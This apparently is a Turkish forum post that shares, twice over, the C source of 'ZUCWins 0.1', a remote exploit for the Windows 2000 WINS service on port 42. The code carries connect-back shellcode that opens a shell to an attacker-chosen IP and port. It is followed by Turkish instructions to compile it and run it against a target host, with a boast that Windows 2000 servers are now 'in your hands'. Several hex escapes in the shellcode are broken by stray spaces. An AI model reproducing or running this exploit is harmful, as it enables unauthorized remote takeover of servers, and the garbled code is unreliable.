Exploeit dokumanlar ve anlatim teknikleri

windows 2000 kullanan server lar için exp c de yazılmış

************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by : <zuc@hack.it> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/

/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\ x59\ x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\ x57\ x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\ xff\ xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\ x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\ x8b\ x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\ x53\ x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\ x34\ x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\ x45\ x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\ x58\ x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\ x88\ x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\ xbe\ xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\ x89\ xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\ x8b\ x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\ x66\ x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\ x53\ x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\ x10\ x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\ xff\ x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\ x5c\ x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\ x53\ xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\ xb1\ x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\ xf0\ x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\ x05\ x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\ x05\ x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
void usage();

int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("
[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf("
[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("
[*] exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

exploiti nasıl indirdiyseniz adını değiştirmeyinn
gcc win2000.c -o win
./win www.hedef.com 212.0.0.1 31337
olmazsa /win deneyin

windows2000 kullanan serverlar elinizde saygılar

windows 2000 kullanan server lar için exp c de yazılmış

************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by : <zuc@hack.it> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/

/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\ x59\ x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\ x57\ x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\ xff\ xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\ x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\ x8b\ x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\ x53\ x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\ x34\ x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\ x45\ x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\ x58\ x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\ x88\ x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\ xbe\ xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\ x89\ xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\ x8b\ x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\ x66\ x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\ x53\ x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\ x10\ x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\ xff\ x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\ x5c\ x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\ x53\ xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\ xb1\ x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\ xf0\ x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\ x05\ x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\ x05\ x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
void usage();

int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("
[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf("
[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("
[*] exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

exploiti nasıl indirdiyseniz adını değiştirmeyinn
gcc win2000.c -o win
./win www.hedef.com 212.0.0.1 31337
olmazsa /win deneyin

windows2000 kullanan serverlar elinizde saygılar